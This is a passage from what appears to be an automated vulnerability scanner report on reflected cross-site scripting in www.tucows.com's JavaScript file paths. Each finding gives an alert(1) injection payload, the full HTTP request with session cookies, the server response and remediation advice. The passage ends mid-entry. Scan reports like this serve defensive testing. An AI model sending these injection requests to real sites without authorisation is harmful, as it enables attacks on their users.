HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:31 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1d9"-alert(1)-"aaec46b7783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:42 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d85f"-alert(1)-"b501c96f23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:52 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a50d"-alert(1)-"addf45cb35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:03 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.285. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/x_core.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77ea"-alert(1)-"c2c5c57e4b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52264"-alert(1)-"ba7b1f5ec8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83368"-alert(1)-"1009c251c75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:49 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d685f"-alert(1)-"468f4a77932 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesd685f"-alert(1)-"468f4a77932/js/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5e35"-alert(1)-"277a1eb2d25 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/jsc5e35"-alert(1)-"277a1eb2d25/xdocsize.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:10 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b699"-alert(1)-"96b8d0b02cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/xdocsize.js6b699"-alert(1)-"96b8d0b02cb HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.291. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/includes/js/xdocsize.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5207"-alert(1)-"8d2e3d0b84e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/xdocsize.js?b5207"-alert(1)-"8d2e3d0b84e=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:20 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3505f"-alert(1)-"50098cc31b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images3505f"-alert(1)-"50098cc31b/newassets/includes/js/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24c7b"-alert(1)-"983752aa4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets24c7b"-alert(1)-"983752aa4e5/includes/js/yetii.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3dce"-alert(1)-"df3be201d5f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
